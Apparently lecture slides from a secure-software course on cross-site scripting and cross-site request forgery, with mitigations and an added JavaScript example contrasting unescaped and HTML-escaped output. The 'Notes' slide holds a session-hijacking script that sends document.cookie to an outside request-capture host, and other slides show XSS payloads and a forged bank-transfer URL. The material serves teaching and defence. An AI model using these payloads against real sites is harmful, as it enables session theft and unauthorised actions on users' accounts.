VOTD: XSS & CSRF
Engineering Secure Software
Last Revised: September 8, 2020
SWEN-331: Engineering Secure Software, Benjamin S Meyers
What is XSS?
● XSS: Cross Site Scripting
● Injecting malicious scripts into a web page
● CWE-79
Types of XSS
● Stored
  ○ The malicious script gets saved to the webserver
  ○ Usually stored in a database
● Reflected
  ○ The malicious script does not get saved to the webserver, but its execution is reflected in the website's results/GUI
● DOM: Document Object Model
  ○ The DOM environment is changed, but the website code remains unchanged
Reflected XSS Example
● <script>alert("You've been hacked!")</script>
Reflected XSS Example
● <img src="http://www.page.com/img.jpg">
Stored XSS Example
● Same as reflected, but the malicious script gets saved in the database and executed every time the field with the script gets displayed on the page
● DVWA → XSS (Stored)
  ○ Enter <script>alert("You've been hacked!")</script> in the comments box
  ○ Every time you hit "Sign Guestbook", the script will execute again
DOM XSS Example
● Changing the DOM environment in a browser causes the client-side code (which is unchanged) to execute differently
● Normal URL: http://testing.com/book.html?default=1
● Attacked URL: http://testing.com/book.html?default=<script>alert(document.cookie)</script>
Mitigations
● Defense in Depth
  ○ Thorough input validation
  ○ Accept only known good inputs (e.g. whitelist)
  ○ Escape special characters (e.g. < to &lt;)
● Code reviews!
● Automated testing
  ○ Fuzzers!
● Input sanitization libraries
  ○ Ruby on Rails: sanitize gem
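Added example (not from the slides): the "escape special characters" mitigation applied to the book.html?default= parameter from the DOM XSS slide, with the unescaped rendering beside the escaped one. The names escapeHtml, renderDefaultVulnerable, renderDefaultSafe and containsScriptTag are my own; the attack URL is the one shown on the slide.

```javascript
// Added example: HTML output encoding as the "escape special characters"
// mitigation from the slides. Names and structure are mine, not the course's.

// Each HTML-significant character mapped to its entity. Encoding all five
// keeps untrusted text inert in both element-content and attribute contexts.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Vulnerable: the query parameter is concatenated straight into markup,
// the pattern behind the book.html?default=... example on the slide.
function renderDefaultVulnerable(url) {
  const value = new URL(url).searchParams.get("default") || "";
  return `<option selected>${value}</option>`;
}

// Hardened: encode before interpolation so the browser treats the
// parameter as text, never as markup.
function renderDefaultSafe(url) {
  const value = new URL(url).searchParams.get("default") || "";
  return `<option selected>${escapeHtml(value)}</option>`;
}

// Detection helper: does the produced markup still contain a script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The attacked URL from the DOM XSS slide.
const ATTACK_URL =
  "http://testing.com/book.html?default=<script>alert(document.cookie)</script>";

console.log("vulnerable:", renderDefaultVulnerable(ATTACK_URL));
console.log("escaped:   ", renderDefaultSafe(ATTACK_URL));
```

The vulnerable output carries a live <script> element; the escaped output carries only &lt;script&gt; text, which the browser displays rather than executes.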
Notes
● Commonly used for session hijacking
  <script>
  x = new XMLHttpRequest();
  x.open("GET", "http://requestb.in/13x2ec31?s=" + document.cookie, true);
  x.send();
  </script>
● Has been used against GMail, Twitter, Facebook, Yahoo, etc.
● Good discussion of XSS and exploits
● Not just <script> tags
  ○ e.g. CSS injection
  ○ e.g. Image metadata
  ○ e.g. File uploads (fake images that are actually PHP scripts)
What is CSRF?
● CSRF: Cross Site Request Forgery
  ○ XSS exploits the trust that a client has for a website
  ○ CSRF exploits the trust that a site has for the user
● Running malicious scripts on behalf of an authenticated user
● Usually: when an HTTP GET request makes a persistent modification, you can get users to make changes to other websites they are already authenticated to
● CWE-352
CSRF Examples
● Malicious links in emails sent from a trusted address
● Modifying arguments in a URL query string to cause malicious behavior
  ○ http://bank.com/transfer.do?acct=BEN&amount=100000
Mitigations
● Don't allow GET actions to make persistent modifications
  ○ If you have to use GET, make it re-authenticate
● Don't allow session tokens in URL query strings, only cookies
● Don't load images in emails from untrusted addresses
  ○ Image metadata can contain scripts that get run when loaded
● Don't open emails from untrusted addresses, period